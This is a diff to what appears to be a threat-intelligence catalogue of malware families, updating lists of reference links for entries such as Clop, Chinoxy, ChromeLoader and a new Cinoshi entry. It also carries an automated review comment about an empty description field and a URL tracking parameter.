+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
+ "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
+ "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/",
+ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
 "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
 "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
- "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf",
- "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
- "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
- "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
- "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
- "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4",
- "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
- "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
 "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
- "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
- "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
- "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://attack.mitre.org/groups/G0125/",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
- "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
+ "https://attack.mitre.org/groups/G0096",
 "https://attack.mitre.org/software/S0020/",
- "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
- "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
- "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
- "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://twitter.com/ESETresearch/status/1366862946488451088",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/",
 "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4",
+ "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion",
 "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
+ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
+ "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
+ "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
+ "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://attack.mitre.org/groups/G0125/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/",
+ "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
+ "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
+ "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
+ "https://www.youtube.com/watch?v=rn-6t7OygGk",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president"
 ],
 "synonyms": [],
 "type": []
@@ -17607,7 +18442,9 @@
 "description": "Adware that shows advertisements using plugin techniques for popular browsers",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad",
+ "https://www.malwarebytes.com/blog/news/2015/06/unusual-exploit-kit-targets-chinese-users-part-2",
+ "https://www.malwarebytes.com/blog/news/2015/05/unusual-exploit-kit-targets-chinese-users-part-1"
 ],
 "synonyms": [],
 "type": []
@@ -17633,11 +18470,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto",
+ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
 "https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92",
- "https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/",
 "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
- "https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/",
- "https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064"
+ "https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/",
+ "https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064",
+ "https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/"
 ],
 "synonyms": [],
 "type": []
@@ -17651,15 +18489,15 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy",
 "https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf",
- "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
 "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
- "https://community.riskiq.com/article/5fe2da7f",
- "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
 "https://community.riskiq.com/article/56fa1b2f",
 "https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://community.riskiq.com/article/5fe2da7f",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
 "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02"
 ],
 "synonyms": [],
@@ -17714,8 +18552,9 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi",
 "https://cybergeeks.tech/chromeloader-browser-hijacker",
 "https://redcanary.com/blog/chromeloader/",
+ "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension",
 "https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html",
- "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension"
+ "https://www.connectwise.com/blog/threat-report/smash-jacker"
 ],
 "synonyms": [
 "ChromeLoader"
@@ -17732,8 +18571,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic",
 "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
 "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html"
+ "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
 ],
 "synonyms": [
 "AndroKINS"
@@ -17762,9 +18601,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi",
 "https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/",
 "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
- "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf"
+ "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/"
 ],
 "synonyms": [],
 "type": []
@@ -17772,17 +18611,35 @@
 "uuid": "d0f0f754-fe9b-45bd-a9d2-c6110c807af4",
 "value": "Cinobi"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinoshi",
+ "https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat",
+ "https://www.youtube.com/watch?v=-KJ0HIvmVl0",
+ "https://cyble.com/blog/cinoshi-project-and-the-dark-side-of-free-maas/",
+ "https://twitter.com/suyog41/status/1633807752127475713?s=20"
+ ],
+ "synonyms": [
+ "Agniane"
+ ],
+ "type": []
+ },
+ "uuid": "65f75ea8-c06b-4d8d-b757-e992966667b5",
+ "value": "Cinoshi"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel",
 "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
 "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
+ "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
+ "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
 "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/"
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree"
 ],
 "synonyms": [],
 "type": []
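Review bot: The new Cinoshi entry ships with `"description": ""`, so a consumer matching on the Agniane synonym gets a name, a UUID and five links but no statement of what the family is; the Citadel entry below it has the same gap, though that one is pre-existing. Judging only by the reference titles (an Agniane stealer write-up and a "free MaaS" analysis) a one-line description should be easy to source, and if the upstream Malpedia record has none it would be better for the generator to omit the key than to emit an empty string, since the file elsewhere uses absence and empty values inconsistently. The twitter reference also carries a `?s=20` share-tracking parameter that the other refs in this hunk do not, so `"https://twitter.com/suyog41/status/1633807752127475713"` would be the canonical form.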
@@ -17849,12 +18706,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker",
- "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/",
"https://asec.ahnlab.com/en/35981/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/"
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
],
"synonyms": [],
"type": []
@@ -17867,81 +18724,84 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop", - "https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks", - "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/", - "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", - "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", - "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", - "https://github.com/Tera0017/TAFOF-Unpacker", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", - "https://www.youtube.com/watch?v=PqGaZgepNTE", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - 
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://twitter.com/darb0ng/status/1338692764121251840", - "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/", - "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", - "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", - "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/", - 
"https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever", - "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/", - "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", - "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf", + "https://unit42.paloaltonetworks.com/clop-ransomware/", + "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever", + "https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop", - "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", - 
"https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/", + "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/", + "https://asec.ahnlab.com/en/19542/", + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/", + "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", + "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + 
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", + "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/", + "https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/", + "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/", + "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + 
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md", + "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", + "https://www.youtube.com/watch?v=PqGaZgepNTE", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/", - 